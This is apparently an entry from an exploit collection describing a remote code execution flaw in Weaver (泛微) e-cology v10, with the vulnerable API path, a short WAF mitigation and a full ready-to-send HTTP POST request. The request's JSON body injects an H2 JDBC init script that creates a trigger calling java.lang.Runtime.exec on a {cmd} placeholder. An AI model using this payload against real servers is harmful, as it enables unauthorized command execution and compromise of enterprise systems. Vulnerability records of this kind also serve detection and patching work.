vendor = "泛微"
name = "泛微e-cology-v10远程代码执行漏洞-执行命令"
type = "RCE"
version = "未知"
path = "/api/dw/connSetting/testConnByBasePassword"
detail = "POST /api/dw/connSetting/testConnByBasePassword HTTP/1.1 Host: Content-Length: 199 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Content-Type: application/json Accept: */* Origin: http://ip Referer: http://ip/ Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close ETEAMSID: THIRD_18cd45709040d63b6b684d94b5773deb {\"dbType\":\"mysql5\",\"dbUrl\":\"jdbc:h2:mem:test;MODE=MSSQLServer;init = CREATE TRIGGER hhhh BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$ //javascript\\njava.lang.Runtime.getRuntime().exec(\\\"{cmd}\\\")$$\"}"
fix = "WAF封禁路路径，等待发布补丁"
date = "0823"
label = "1day"
